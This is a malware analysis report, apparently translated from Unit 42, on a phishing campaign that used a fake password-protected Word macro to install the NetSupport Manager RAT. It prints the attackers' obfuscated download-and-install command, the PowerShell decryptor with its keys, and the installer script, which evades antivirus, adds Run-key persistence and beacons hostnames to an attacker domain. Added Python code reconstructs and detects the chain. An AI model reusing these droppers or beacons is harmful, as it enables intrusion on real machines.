
In January 2020, security researchers found a malicious Microsoft Word document disguised as password-protected, used in a phishing campaign to deliver a commercial remote access tool, NetSupport Manager. This RAT is normally used by administrators for remote access to client machines; here the attackers installed it on victims' systems to gain access. The campaign used several techniques to evade dynamic and static analysis, and used PowerShell and PowerSploit to carry out the installation of the malicious files. The NetSupport Manager RAT has appeared in phishing campaigns since at least 2018.

Delivery

In early January 2020, a suspicious winword.exe process that executed a batch file was detected. Figure 1 shows several detection points, from the launch of Microsoft Word to the creation and execution of the .bat file. Figure 2 shows the timeline, with the detection alerts, the behavioral process flow and the connection attempts. Figure 3 shows the initial alert raised on these behavioral indicators.

Figure 4 below is a screenshot of the malicious document, disguised as a password-protected NortonLifeLock document that asks the user to enter a password to enable macros. The document used for this analysis

SHA256:e9440a5d2de2453ae5b69a9c096f8d4cf9e059469c5de67380d76e02dd6975

To the user, the document appears to contain personal information that requires a password to view. After the document is opened and "Enable Content" is clicked, the macro runs and shows the user a password dialog.

The password was most likely written in the body of the phishing email; it accepts only the letter "c" or "C", as the macro code below shows. The hash of this macro code:

SHA256:68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2

If the user enters an incorrect password, an error message is shown, followed by a "Done" processing message. No malicious activity takes place until the correct key is entered; once the correct password is supplied, the macro continues executing and builds the following command string:

cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et 
/p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" 
>>%temp%\alpaca.bat&EcHo|s^et /p=" 
http^:^/^/^quickwaysignstx[.]com/view.php 
">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q 
&exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2

The macro obfuscates the strings using multiple labels on a Visual Basic for Applications (VBA) form; the characters are finally concatenated to construct the final command, which downloads and executes the RAT on the victim's machine.

The command string is executed through the VBA Shell function, which does the following:

 1. Launches cmd.exe with the /c parameter, which runs the command and then exits
 2. Builds a batch file named alpaca.bat in the victim's %temp% directory
 3. Executes the newly created batch script

The batch script uses msiexec, part of the Windows Installer service, to download and install a binary from:

 quickwaysignstx[.]com/view.php 
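To make the two-stage build concrete, here is an added Python example (not code from the original post or from Unit 42) that replays cmd.exe's caret handling on the command string above, reassembles the content of alpaca.bat, and reports the indicators a detection rule can key on. The emulation covers only the caret/quote rule the sample relies on, not cmd.exe's full parser, and the command string is a constructed copy of the one shown, joined back onto one line.

```python
import re

# Constructed copy of the obfuscated command string above, joined back onto one line
# (the page shows it wrapped; the macro emits it as a single cmd.exe command line).
OBFUSCATED_COMMAND = (
    r'cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et '
    r'/p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" '
    r'>>%temp%\alpaca.bat&EcHo|s^et /p=" '
    r'http^:^/^/^quickwaysignstx[.]com/view.php '
    r'">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q '
    r'&exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2'
)

# set /p="<text>": the quotes are dropped and <text> is written without a newline
SET_P_FRAGMENT = re.compile(r'set\s+/p="([^"]*)"', re.IGNORECASE)
# first redirection target after a ">" or ">>"
REDIRECT_TARGET = re.compile(r'>>?\s*(%temp%\\[^\s&>]+)', re.IGNORECASE)


def strip_carets(line: str) -> str:
    """Emulate cmd.exe's escape pass for one command line: outside double quotes a
    caret escapes the next character and is removed; inside quotes it is kept as-is.
    That asymmetry is what lets the carets survive into alpaca.bat and disappear only
    when the batch file itself is executed."""
    out, in_quote, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quote = not in_quote
            out.append(ch)
        elif ch == "^" and not in_quote and i + 1 < len(line):
            out.append(line[i + 1])
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def normalize(command: str) -> str:
    """Collapse whitespace and case so indicator matching is stable."""
    return " ".join(command.split()).lower()


def reconstruct_batch(cmdline: str) -> dict:
    """Replay the two-stage build: (1) cmd.exe parses the outer line and the set /p
    fragments are appended to the batch file; (2) the batch file runs and its own
    carets are consumed. Returns the batch path, its raw content, the commands it
    executes, and the indicators worth alerting on."""
    outer = strip_carets(cmdline)
    target = REDIRECT_TARGET.search(outer)
    batch_content = "".join(SET_P_FRAGMENT.findall(outer))
    executed_line = strip_carets(batch_content)
    commands = [normalize(c) for c in executed_line.split("&") if c.strip()]
    findings = []
    for cmd in commands:
        toks = cmd.split()
        if not toks:
            continue
        exe = toks[0].rsplit("\\", 1)[-1]
        if exe in ("msiexec", "msiexec.exe") and "/i" in toks and any(
            t.startswith(("http://", "https://")) for t in toks
        ):
            findings.append("msiexec installs package from remote URL")
            if "/q" in toks:
                findings.append("quiet install (/q)")
    return {
        "batch_path": target.group(1) if target else None,
        "batch_content": batch_content,
        "commands": commands,
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in reconstruct_batch(OBFUSCATED_COMMAND).items():
        print(f"{key}: {value}")
```

The reconstructed batch line still contains carets (`M^siexec ^/i http^:^/^/^...`); they are consumed only when alpaca.bat runs, which is why a static match on `msiexec` in the macro output fails while a match on the executed command succeeds.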

If the User-Agent string in the request is Windows Installer, an MSI file is returned. The MSI payload (SHA256: 41d27d53c5d41003bc9913476a3afd3961b561b1201bee8bfde327a5f0d22a040a) was generated by an unregistered version of the tool from www.exemsi[.]com and is titled "MPZMZQYVXO patch version 5.1". This version string is random and is displayed when the MSI runs. Once downloaded, the MSI is executed with the /q parameter. The MSI installs a PowerShell script, REgistryMPZMZQYVXO.ps1, in the victim's %temp% directory.

function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)
{
# base64-encoded, TripleDES-encrypted second-stage script (contents elided on the page)
$DHPFYCOKLM = "<base64 encoded + encrypted payload>";
$encoding = New-Object System.Text.ASCIIEncoding;
# 16-byte IV, used verbatim as ASCII
$KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD");
# key derivation: PasswordDeriveBytes(password, salt, SHA1, 2 iterations), first 16 bytes
$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, $encoding.GetBytes($BORBFDSYOP), "SHA1", 2);
[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);
$LCZJFEXHXR = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
$LCZJFEXHXR.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);
# The next two statements are absent from the listing as reproduced on the page; they
# are reconstructed from the Out-EncryptedScript template the script was generated
# with (base64-decode the blob, allocate the output buffer of the same size).
$DHPFYCOKLMa = [System.Convert]::FromBase64String($DHPFYCOKLM);
$JHTZWEZBUW = New-Object Byte[]($DHPFYCOKLMa.Length);
$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, $True);
$ZSKXKODPKK = New-Object System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, $JOVGMJCIKY, [System.Security.Cryptography.CryptoStreamMode]::Read);
$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, $JHTZWEZBUW.Length);
$LBUWDFHHMZ.Close();
$ZSKXKODPKK.Close();
$LCZJFEXHXR.Clear();
# UTF-8 BOM check; as written the stripped copy is assigned to $h and never used
if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) -and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) {
$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }
# unused buffer space reads as NUL bytes and is trimmed before execution
return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);
}
# arguments: password, then salt
$TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" "7ohp9z481qem6ykbdu2argt5lj3fcsi0";
Invoke-Expression $TYCNJNUWWG;

The encrypted data blob stored in REgistryMPZMZQYVXO.ps1 is another PowerShell script, responsible for installing the NetSupport Manager RAT on the victim.

The PowerShell script was generated with Out-EncryptedScript.ps1, an open-source script from the PowerSploit framework. It contains a base64 data-handling module and uses TripleDES in CBC cipher mode.

The decryption key and initialization vector (IV) for this sample are:

 Decryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12
 IV             = DJZGVUGVHDMNIGZD
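As an added example, not the attacker's script and not Unit 42's tooling, the following Python reproduces the key derivation an analyst needs to recover the second stage offline. For an output no longer than one digest, .NET PasswordDeriveBytes equals PBKDF1, so with SHA1 and 2 iterations the key is SHA1(SHA1(password || salt))[:16]; that single-digest case is the only one implemented. The TripleDES step assumes the third-party cryptography package, and whether the derived key equals the key reported above is something the reader runs rather than something asserted here.

```python
import base64
import hashlib

# Values reproduced on the page for this sample: the two arguments passed to the
# decryption function (password, salt), the hard-coded IV, and the key Unit 42 reports.
PASSWORD = "ew9p5rzlmvcf32b6i0oun8q47tag1xhs"
SALT = "7ohp9z481qem6ykbdu2argt5lj3fcsi0"
IV = b"DJZGVUGVHDMNIGZD"
REPORTED_KEY_HEX = "A7A15B277A74CD3233B9DF078ABCDE12"


def password_derive_bytes(password: str, salt: str, iterations: int = 2,
                          length: int = 16, hash_name: str = "sha1") -> bytes:
    """Re-implementation of .NET PasswordDeriveBytes(password, salt, hash, iterations)
    .GetBytes(length) for length <= digest size, where it coincides with PBKDF1:
    T1 = H(password || salt), T_i = H(T_{i-1}), key = T_iterations[:length].
    Out-EncryptedScript uses SHA1 with 2 iterations and takes 16 bytes."""
    if length > hashlib.new(hash_name).digest_size:
        raise ValueError("only the single-digest output case is implemented")
    block = hashlib.new(hash_name, password.encode("ascii") + salt.encode("ascii")).digest()
    for _ in range(iterations - 1):
        block = hashlib.new(hash_name, block).digest()
    return block[:length]


def key_matches_report(password: str = PASSWORD, salt: str = SALT) -> bool:
    """Compare the locally derived key with the key stated on the page."""
    return password_derive_bytes(password, salt).hex().upper() == REPORTED_KEY_HEX


def decrypt_blob(b64_blob: str, key: bytes, iv: bytes = IV) -> bytes:
    """TripleDES-CBC decryption of the base64 blob, mirroring the script's CryptoStream.
    Uses the third-party 'cryptography' package (assumed installed); the import is
    deferred so the key-derivation part of this file runs without it. A 16-byte key
    selects two-key 3DES (K1, K2, K1), as TripleDESCryptoServiceProvider does."""
    try:  # newer releases moved TripleDES to the 'decrepit' namespace
        from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
    except ImportError:
        from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
    from cryptography.hazmat.primitives.ciphers import Cipher, modes
    data = base64.b64decode(b64_blob)
    decryptor = Cipher(TripleDES(key), modes.CBC(iv)).decryptor()
    plain = decryptor.update(data) + decryptor.finalize()
    pad = plain[-1] if plain else 0  # .NET's CryptoStream strips PKCS7 padding; do the same
    if 1 <= pad <= 8 and plain.endswith(bytes([pad]) * pad):
        plain = plain[:-pad]
    return plain


def finish_script(raw: bytes) -> str:
    """Post-processing the script applies before Invoke-Expression: drop a UTF-8 BOM,
    decode as ASCII and trim trailing NULs left by the oversized read buffer. (In the
    listing as reproduced, the BOM-stripped buffer is assigned to $h and never used.)"""
    if raw[:3] == b"\xef\xbb\xbf":
        raw = raw[3:]
    return raw.decode("ascii", errors="replace").rstrip("\x00")


if __name__ == "__main__":
    key = password_derive_bytes(PASSWORD, SALT)
    print("derived key:", key.hex().upper(), "matches page:", key_matches_report())
```

With the blob from a captured REgistryMPZMZQYVXO.ps1, `finish_script(decrypt_blob(blob, password_derive_bytes(PASSWORD, SALT)))` yields the plaintext installer script without ever running Invoke-Expression.
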
# Directory the script runs from; abort if the path contains Avast/AVG
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
if ($scriptpath -match "avast") {exit}
if ($scriptpath -match "Avast") {exit}
if ($scriptpath -match "AVG") {exit}
if ($scriptpath -match "avg") {exit}
# Wrapper: decode one embedded blob and write it to $destination
function react (
  $source,
  $destination
)
{
Convert-StringToBinary -InputString $source -FilePath $Destination;
  #      }
     }#}
# Decoding chain for each blob: base64 -> gzip decompress -> base64 -> raw file bytes
function Convert-StringToBinary
(
 $InputString
,  $FilePath
)
{
$file= $InputString
$data = [System.Convert]::FromBase64String($file)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null

$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$t = $sr.readtoend()#|out-file str.txt

$ByteArray = [System.Convert]::FromBase64String($t);
[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);
}
function Install
{
# The twelve NetSupport Manager components, each gzip-compressed and base64-encoded (contents elided on the page)
$file1 = "<Gzip compressed + base64 encoded file>";
$file2 = "<Gzip compressed + base64 encoded file>";
$file3 = "<Gzip compressed + base64 encoded file>";
$file4 = "<Gzip compressed + base64 encoded file>";
$file5 = "<Gzip compressed + base64 encoded file>";
$file6 = "<Gzip compressed + base64 encoded file>";
$file7 = "<Gzip compressed + base64 encoded file>";
$file8 = "<Gzip compressed + base64 encoded file>";
$file9 = "<Gzip compressed + base64 encoded file>";
$file10 = "<Gzip compressed + base64 encoded file>";
$file11 = "<Gzip compressed + base64 encoded file>";
$file12 = "<Gzip compressed + base64 encoded file>";

# Random 8-character alphanumeric directory name under %APPDATA% (Roaming)
$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) )
$fpath ="$env:appdata\$randf"
mkdir $fpath
# The NetSupport client (originally client32.exe) is written under a benign-looking name
$clientname="presentationhost.exe"
$Source = $file1
$Destination = "$fpath\"+"$clientname"
react -source $source -destination $destination
$Source = $file2
$Destination = "$fpath\client32.ini"
write-host $destination
react -source $source -destination $destination
$Source = $file3
$Destination = "$fpath\HTCTL32.DLL"
react -source $source -destination $destination
$Source = $file4
$Destination = "$fpath\msvcr100.dll"
react -source $source -destination $destination
$Source = $file5
$Destination = "$fpath\nskbfltr.inf"
react -source $source -destination $destination
$Source = $file6
$Destination = "$fpath\NSM.ini"
react -source $source -destination $destination
$Source = $file7
$Destination = "$fpath\NSM.lic"
react -source $source -destination $destination
$Source = $file8
$Destination = "$fpath\pcicapi.dll"
react -source $source -destination $destination
$Source = $file9
$Destination = "$fpath\PCICHEK.DLL"
react -source $source -destination $destination
$Source = $file10
$Destination = "$fpath\PCICL32.DLL"
react -source $source -destination $destination
$Source = $file11
$Destination = "$fpath\remcmdstub.exe"
react -source $source -destination $destination
$Source = $file12
$Destination = "$fpath\TCCTL32.DLL"
react -source $source -destination $destination
# Persistence: HKCU Run value named ServiceDLL pointing at the renamed client
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f
start-process "$fpath\$clientname"
#Start-sleep -s 10
# Report the computer name to the attacker's logging endpoint
Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername"
$f=get-content $env:temp\insghha4.txt

# Clean-up: delete the dropped .ps1 scripts, then the path read from insghha4.txt
remove-item $env:TEMP\*.ps1
#cmd /c del %temp%\*.ps1 /f
#cmd /c del %temp%\*.txt /f
remove-item $f
}
#ShowConsole
#rights

install;

The RAT installation script does the following:

1. Stops the installation if Avast or AVG antivirus software is running on the target

2. Installs the 12 files that make up the NetSupport Manager RAT into a random directory (8 characters long) under the victim's %appdata%, for example C:\Users\%username%\AppData\Roaming\%randomvalue%

3. Creates the following registry entry on the victim: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Name: ServiceDLL

Value: C:\Users\%username%\AppData\Roaming\%randomvalue%\presentationhost.exe

4. Executes the main NetSupport Manager RAT, presentationhost.exe

5. Sleeps for 10 seconds

6. Sends the victim's computer name to http://afsasdfa33[.]xyz/iplog/lepo.php?hst=%computername%

7. Any data returned from the site afsasdfa33[.]xyz is saved in insghha4.txt in the %temp% directory

8. Deletes all files with the .ps1 extension from the victim's %temp% directory

9. Deletes the file named insghha4.txt
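As an added example (not from the original post), here is a small rule set in Python that evaluates the chain described in steps 1 to 9 against constructed endpoint telemetry. The event schema, hostname, user name and random directory name are made up for the demonstration; the file names, the Run value name and the beacon path come from the script above.

```python
import re
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# File names the installer writes (from the script above; client32.exe is the
# client's original name)
NETSUPPORT_FILES = {
    "presentationhost.exe", "client32.exe", "client32.ini", "htctl32.dll", "msvcr100.dll",
    "nskbfltr.inf", "nsm.ini", "nsm.lic", "pcicapi.dll", "pcichek.dll", "pcicl32.dll",
    "remcmdstub.exe", "tcctl32.dll",
}
# %APPDATA%\<8 random alphanumerics>\<file>
RANDOM_ROAMING = re.compile(r"\\AppData\\Roaming\\[A-Za-z0-9]{8}\\[^\\]+$", re.IGNORECASE)
TEMP_SCRIPT = re.compile(r"\\Temp\\[^\\]+\.(?:bat|ps1)$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\b.*\s/i\s+https?://", re.IGNORECASE)

Event = Dict[str, str]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Event]) -> List[Tuple[str, Event]]:
    """Apply the rules to telemetry events and return (rule_id, event) hits.
    Event shapes (constructed for this example, not a real sensor schema):
    process: parent, image, cmdline; file: image, path;
    registry: image, key, value, data; network: image, url."""
    hits = []
    for e in events:
        kind, image = e["type"], basename(e.get("image", ""))
        if kind == "process":
            if basename(e.get("parent", "")) in OFFICE_APPS and image in SHELLS:
                hits.append(("office_spawns_shell", e))
            if image == "msiexec.exe" and REMOTE_MSI.search(e.get("cmdline", "")):
                hits.append(("msiexec_remote_package", e))
        elif kind == "file":
            path = e["path"]
            if image in SHELLS and TEMP_SCRIPT.search(path):
                hits.append(("shell_writes_temp_script", e))
            if RANDOM_ROAMING.search(path) and basename(path) in NETSUPPORT_FILES:
                hits.append(("netsupport_component_in_random_roaming_dir", e))
        elif kind == "registry":
            if RUN_KEY.search(e["key"]) and RANDOM_ROAMING.search(e["data"]):
                hits.append(("run_key_to_random_roaming_dir", e))
        elif kind == "network":
            if "/iplog/lepo.php" in e["url"] and "hst=" in e["url"]:
                hits.append(("beacon_with_hostname", e))
    return hits


def rule_ids(events: List[Event]) -> List[str]:
    """Sorted, de-duplicated rule ids that fired."""
    return sorted({rule for rule, _ in evaluate(events)})


# Constructed sample telemetry following the chain described above (user name,
# hostname and the random directory are made up).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
    {"type": "process", "parent": "winword.exe", "image": "cmd.exe",
     "cmdline": r'cmd /c echo|set /p=" M^siexe">%temp%\alpaca.bat'},
    {"type": "file", "image": "cmd.exe", "path": r"C:\Users\alice\AppData\Local\Temp\alpaca.bat"},
    {"type": "process", "parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i http://quickwaysignstx[.]com/view.php /q"},
    {"type": "file", "image": "powershell.exe",
     "path": r"C:\Users\alice\AppData\Roaming\aB3kQz9x\presentationhost.exe"},
    {"type": "file", "image": "powershell.exe",
     "path": r"C:\Users\alice\AppData\Roaming\aB3kQz9x\client32.ini"},
    {"type": "registry", "image": "reg.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "ServiceDLL",
     "data": r"C:\Users\alice\AppData\Roaming\aB3kQz9x\presentationhost.exe"},
    {"type": "network", "image": "powershell.exe",
     "url": "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=WS-ALICE"},
]

if __name__ == "__main__":
    for rule, event in evaluate(SAMPLE_EVENTS):
        print(rule, "<-", event)
```

The benign notepad.exe event fires nothing; each stage of the chain fires exactly one rule, and the two NetSupport component writes fire the same rule twice, which is what you want when correlating by the random directory name.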

Once started, NetSupport Manager (presentationhost.exe) queries the domain geo.netsupportsoftware[.]com for the host's geolocation. The original name of the NetSupport Manager client is client32.exe; it was renamed presentationhost.exe to avoid arousing the victim's suspicion. Sample traffic follows:

POST http://94.158.245[.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 94.158.245[.]182
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1

Response:

HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=.g+$.{.. \….W…bb…).w}..o..X..xf…

Encrypted data sent by the victim:

POST http://94.158.245[.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
Host: 94.158.245[.]182
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r..4.]..%y-…..=I…D3.W..i.7?….=@….F.f….&t.[..6ra..L..Tzg..... ..U.z4.]..%y-A9H=n .:!.”Pfd]U,[.(...f=I.....W.p..RHz.....#..@.....>|.?...R...s.nt.G..=}\[email protected][email protected]……..M.6..
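The following Python parser is an added example, not part of the original post: it splits the NetSupport gateway exchange above into headers and the KEY=VALUE body and returns the indicators that distinguish this traffic (the client User-Agent, the Gateway Server header, the /fakeurl.htm poll URI, CMD=POLL/ENCD, and ES=1 together with DATA). The two messages are constructed from the captures shown; the response's binary DATA is replaced by a placeholder.

```python
from typing import Dict, List

# Constructed from the request and response reproduced above. The request body is the
# three lines shown (Content-Length 22 = 9 + 7 + 6 bytes); the response DATA field is
# binary on the wire and is replaced here by a placeholder.
SAMPLE_REQUEST = (
    "POST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\n"
    "User-Agent: NetSupport Manager/1.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 22\r\n"
    "Host: 94.158.245[.]182\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "CMD=POLL\nINFO=1\nACK=1\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: NetSupport Gateway/1.6 (Windows NT)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 60\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "CMD=ENCD\nES=1\nDATA=<41 bytes of ciphertext>\n"
)


def parse_message(raw: str) -> Dict:
    """Split an HTTP message into start line, lower-cased headers and the NetSupport
    gateway body, which is a newline-separated list of KEY=VALUE fields rather than
    the form encoding the Content-Type claims."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    start = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {}
    for line in body.split("\n"):
        if "=" in line:
            key, _, value = line.partition("=")
            fields[key] = value
    is_response = lines[0].startswith("HTTP/")
    return {
        "is_response": is_response,
        "target": None if is_response else start[1],
        "headers": headers,
        "fields": fields,
    }


def classify(msg: Dict) -> List[str]:
    """Indicators that mark a NetSupport Manager client/gateway exchange."""
    indicators = []
    h, f = msg["headers"], msg["fields"]
    if h.get("user-agent", "").startswith("NetSupport Manager"):
        indicators.append("netsupport_client_user_agent")
    if h.get("server", "").startswith("NetSupport Gateway"):
        indicators.append("netsupport_gateway_server_header")
    if msg["target"] and msg["target"].lower().endswith("/fakeurl.htm"):
        indicators.append("gateway_poll_uri")
    if f.get("CMD") in ("POLL", "ENCD"):
        indicators.append("netsupport_cmd_" + f["CMD"].lower())
    if f.get("ES") == "1" and "DATA" in f:
        indicators.append("encrypted_session_data")
    return indicators


if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print(classify(parse_message(raw)))
```

The Content-Type header advertises form data, but the body is not URL-encoded; a proxy or IDS rule that keys on the User-Agent and Server strings, the fixed /fakeurl.htm path and the CMD= field is more reliable than one that tries to decode the body.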

Summary

The campaign ran from early November 2019 to the end of January 2020. Throughout the first half of November, all related activity used email attachments referencing individuals or public figures publicly associated with the targeted company. All emails were sent from random protonmail[.]com addresses, with subjects related to refund status or unauthorized transactions. From late November until January 2020 the attachment changed to a file named <target company website>.doc, with the same email subjects. The intent behind the attacks is currently unclear.

*Source: Unit 42; compiled by Kriston. When reprinting, please credit FreeBuf.COM
